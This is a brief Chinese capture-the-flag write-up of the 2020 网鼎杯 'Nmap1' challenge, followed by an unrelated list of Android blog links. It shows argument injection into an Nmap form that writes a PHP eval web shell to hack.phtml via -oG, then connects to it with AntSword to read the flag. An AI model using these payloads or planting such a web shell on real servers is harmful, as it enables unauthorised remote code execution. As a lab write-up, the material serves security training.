命令执行 [网鼎杯 2020 朱雀组]Nmap1

打开题目

输入127.0.0.1

可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令

127.0.0.1 | ls

可以看到|\转义,尝试使用;

直接放入Payload:

' <?php @eval($_POST["hack"]);?> -oG hack.php '

尝试修改文件名后缀为phtml

' <?php @eval($_POST["hack"]);?> -oG hack.phtml '

加上扫描的地址:127.0.0.1

127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG hack.phtml'

得到

查看扫描列表:

查看写入的文件,即访问hack.phtml

蚁剑连接

在根目录找到了flag

相关推荐
kerli2 小时前
Android 嵌套滑动设计思想
android·客户端
恣艺3 小时前
LeetCode 854:相似度为 K 的字符串
android·算法·leetcode
阿华的代码王国4 小时前
【Android】相对布局应用-登录界面
android·xml·java
用户207038619494 小时前
StateFlow与SharedFlow如何取舍?
android
QmDeve4 小时前
原生Android Java调用系统指纹识别方法
android
淹没4 小时前
🚀 告别复杂的HTTP模拟!HttpHook让Dart应用测试变得超简单
android·flutter·dart
HX4365 小时前
MP - List (not just list)
android·ios·全栈
安卓开发者6 小时前
Android WorkManager 详解:高效管理后台任务
android